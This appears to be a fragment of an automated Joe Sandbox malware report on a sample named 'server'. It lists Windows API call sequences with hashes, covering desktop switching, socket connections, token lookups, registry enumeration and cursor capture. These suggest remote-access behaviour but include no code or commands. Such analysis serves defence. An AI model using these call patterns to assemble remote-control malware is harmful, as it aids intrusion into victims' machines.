                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Locallstrlen$AllocWindow$SizeSleepTextVisible
                                                                                              • String ID:
                                                                                              • API String ID: 2862634755-0
                                                                                              • Opcode ID: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                                                                                              • Instruction ID: 3dedb17b5f53bc68f4680ffa48498177935556d525806c47c9f4f8922cb1ae20
                                                                                              • Opcode Fuzzy Hash: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                                                                                              • Instruction Fuzzy Hash: D1215EB2204355ABE714DF64CC85AAB73E9FB88300F414928FB5697240EBB4E949CB65
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 10012992
                                                                                              • GetThreadDesktop.USER32(00000000), ref: 10012999
                                                                                              • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
                                                                                              • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
                                                                                              • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
                                                                                              • SetThreadDesktop.USER32(00000000), ref: 10012A18
                                                                                              • CloseDesktop.USER32(00000000), ref: 10012A30
                                                                                              • CloseDesktop.USER32(00000000), ref: 10012A33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 3718465862-0
                                                                                              • Opcode ID: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                                                                                              • Instruction ID: c967bd72d2f0f6242c0139ef5eee9d5da27d55a5de029f67c8097565ae890da2
                                                                                              • Opcode Fuzzy Hash: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                                                                                              • Instruction Fuzzy Hash: B2110871104349ABF310DB60CC4AFDB7799EB88700F000829FB4196191EFB4A94986A2
                                                                                              APIs
                                                                                              • GetStringTypeW.KERNEL32(00000001,0040642C,00000001,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040520D
                                                                                              • GetStringTypeA.KERNEL32(00000000,00000001,00406428,00000001,?,?,00000000,00000000,00000001), ref: 00405227
                                                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040525B
                                                                                              • MultiByteToWideChar.KERNEL32(oD@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00405293
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052E9
                                                                                              • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: StringType$ByteCharMultiWide
                                                                                              • String ID: oD@
                                                                                              • API String ID: 3852931651-4270158488
                                                                                              • Opcode ID: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
                                                                                              • Instruction ID: 4e9507d7fde2c7550347533a2b4aeff6ceb3887050b9cf78e8730f58af229727
                                                                                              • Opcode Fuzzy Hash: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
                                                                                              • Instruction Fuzzy Hash: 04416F71640619EFCF209F94DD85DAF3FB8EB08790F10443AF912E6290C37989618FA9
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 10006317
                                                                                              • gethostbyname.WS2_32(?), ref: 10006323
                                                                                              • inet_ntoa.WS2_32(?), ref: 1000634D
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100063BB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100063BE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005F50,00000000,00000000,00000000), ref: 100063FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID: gfff
                                                                                              • API String ID: 772126777-1553575800
                                                                                              • Opcode ID: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
                                                                                              • Instruction ID: c7197912ff5fd36304896d9e0e4c3c204ad4e708709a044846b952971cfb3809
                                                                                              • Opcode Fuzzy Hash: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
                                                                                              • Instruction Fuzzy Hash: CD21E1327046155BE328DA389C45B2BB7E3FBC8760F658229FA06E72D4CEF4EC008654
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 10005E57
                                                                                              • gethostbyname.WS2_32(?), ref: 10005E63
                                                                                              • inet_ntoa.WS2_32(?), ref: 10005E8D
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10005EFB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10005EFE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005880,00000000,00000000,00000000), ref: 10005F3A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID: gfff
                                                                                              • API String ID: 772126777-1553575800
                                                                                              • Opcode ID: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
                                                                                              • Instruction ID: 4bb7b8ee4ec5a65906e8f0a6ea5f30d081eb742cdef018fe392bcbb4b8c5aab5
                                                                                              • Opcode Fuzzy Hash: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
                                                                                              • Instruction Fuzzy Hash: A121E1367042555BE328DA389C45B2BB7E2FBC4761F658229FA46E72D0CEF4EC008618
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 100066F7
                                                                                              • gethostbyname.WS2_32(?), ref: 10006703
                                                                                              • inet_ntoa.WS2_32(?), ref: 1000672D
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000679B
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000679E
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10006410,00000000,00000000,00000000), ref: 100067DA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID: gfff
                                                                                              • API String ID: 772126777-1553575800
                                                                                              • Opcode ID: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
                                                                                              • Instruction ID: 58ebadb22f4f2352d4f0c07478b8d6832934a2795fef116bc6cf84ea50f8ad69
                                                                                              • Opcode Fuzzy Hash: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
                                                                                              • Instruction Fuzzy Hash: BC21B4367046155BE328DA399C85B1AB7E3FBC8760F658229FA16E72D4CEF4EC048614
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,?), ref: 10068AA6
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00019018,0000000C,?), ref: 10068ADA
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10068B01
                                                                                              • CoInitialize.OLE32(00000000), ref: 10068B0B
                                                                                              • CreateWindowExA.USER32(00000000,#32770,1007DE30,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10068B2D
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 10068B38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@CreateWindow$EventInitializeShow
                                                                                              • String ID: #32770
                                                                                              • API String ID: 1167904864-463685578
                                                                                              • Opcode ID: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
                                                                                              • Instruction ID: c40a7aba82008906b23f1e1996f2c44ea210c5d9a3af39e251ea5516931b2029
                                                                                              • Opcode Fuzzy Hash: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
                                                                                              • Instruction Fuzzy Hash: D8212BB0904B909FD320DF6A8D84A56FBE8FB08740F808D2EE59AD7A00D378A9048F55
                                                                                              APIs
                                                                                                • Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
                                                                                                • Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
                                                                                                • Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D
                                                                                              • GetCursorPos.USER32(?), ref: 1000FF9A
                                                                                              • GetCursorInfo.USER32(?), ref: 1000FFBB
                                                                                              • DestroyCursor.USER32(?), ref: 1000FFE4
                                                                                              • GetTickCount.KERNEL32 ref: 100100D8
                                                                                              • Sleep.KERNEL32(00000001), ref: 100100ED
                                                                                              • GetTickCount.KERNEL32 ref: 100100EF
                                                                                              • GetTickCount.KERNEL32 ref: 100100FC
                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 10010100
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3294368536-0
                                                                                              • Opcode ID: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
                                                                                              • Instruction ID: 7b30b2465e0484a6c358d486dbc3e3e74d89055d9b4a2f1a32c3f10f469ee35a
                                                                                              • Opcode Fuzzy Hash: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
                                                                                              • Instruction Fuzzy Hash: 18515E753007459FE724DF28C880A6BB3E6FF88350F144A2DF5868B652DBB1F9858B61
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E06A
                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 1000E09C
                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 1000E0DB
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?), ref: 1000E118
                                                                                              • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 1000E16D
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000E1B2
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 1000E1BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@AllocCloseEnumInfoLocalOpenQuery
                                                                                              • String ID:
                                                                                              • API String ID: 71355648-0
                                                                                              • Opcode ID: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                                                                                              • Instruction ID: 1bdc6b41a68a7066ed18929c9f9129e6b3d940a8bf03ad75385409d59a1399c2
                                                                                              • Opcode Fuzzy Hash: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                                                                                              • Instruction Fuzzy Hash: 314190716083556FE314CF28CC84A6BBBE9EBC8750F048A2DFA49D7240D675DD05CBA2
                                                                                              APIs
                                                                                              • OpenProcessToken.ADVAPI32(?,00020028,?,?,1007B960,76F90440,00000000), ref: 100116A6
                                                                                              • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 100116D5
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 100116E2
                                                                                              • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10011700
                                                                                              • LookupAccountSidA.ADVAPI32 ref: 10011740
                                                                                              • LookupAccountSidA.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 10011780
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100117B1
                                                                                              • CloseHandle.KERNEL32(?), ref: 100117BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Token$AccountGlobalInformationLookup$AllocCloseFreeHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1197180021-0
                                                                                              • Opcode ID: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
                                                                                              • Instruction ID: aef5199e8c4097825b2e0746fe6a036d64d1b07520511a5969cee2b76a0b1f35
                                                                                              • Opcode Fuzzy Hash: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
                                                                                              • Instruction Fuzzy Hash: 714182762083456FE714DF64C8C49AFB7E9FBC8354F01092DF68597280D6B5ED488BA2
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403966
                                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 0040397A
                                                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 004039A6
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 004039DE
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A00
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A19
                                                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403A2C
                                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1823725401-0
                                                                                              • Opcode ID: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
                                                                                              • Instruction ID: ad9dd923ed9d3c248ceca5dc3862fa0172e5803eec53910c5ff1caad3bb93819
                                                                                              • Opcode Fuzzy Hash: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
                                                                                              • Instruction Fuzzy Hash: A831D4B26042116FD7207F796CC483BBE9CE649346B15063BF592F3280D6794E454BA9
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 10005000
                                                                                              • htons.WS2_32 ref: 10005027
                                                                                              • inet_addr.WS2_32(1007DD2C), ref: 10005037
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 10005066
                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 10005072
                                                                                              • Sleep.KERNEL32(00000028), ref: 10005076
                                                                                              • closesocket.WS2_32(00000000), ref: 10005079
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 1000508E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3058909470-0
                                                                                              • Opcode ID: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
                                                                                              • Instruction ID: 902ebb94e04e1c7c5fd66402ba9005c87273360587b7ce246dad50b3abbda6e0
                                                                                              • Opcode Fuzzy Hash: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
                                                                                              • Instruction Fuzzy Hash: 871170711053A4ABF310AF65CC89B6ABBB9FF49B41F00841EF19887291DBB598048B66
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 1486965892-0
                                                                                              • Opcode ID: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
                                                                                              • Instruction ID: e4da530426af2831799a229c98be5beb60846619531619ef35dcfd8c2b457cff
                                                                                              • Opcode Fuzzy Hash: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
                                                                                              • Instruction Fuzzy Hash: 5751A875A00544ABEB05DF65CC41BDFB7BEEF85790F00C129F509AB245DB34B90587A1
                                                                                              APIs
                                                                                              • GetVersionExA.KERNEL32 ref: 10004676
                                                                                              • inet_addr.WS2_32(?), ref: 100046A1
                                                                                              • gethostbyname.WS2_32(?), ref: 100046AD
                                                                                              • inet_ntoa.WS2_32(?), ref: 100046D7
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000474B
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000474E
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 1000477A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandleVersiongethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 3347725681-0
                                                                                              • Opcode ID: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
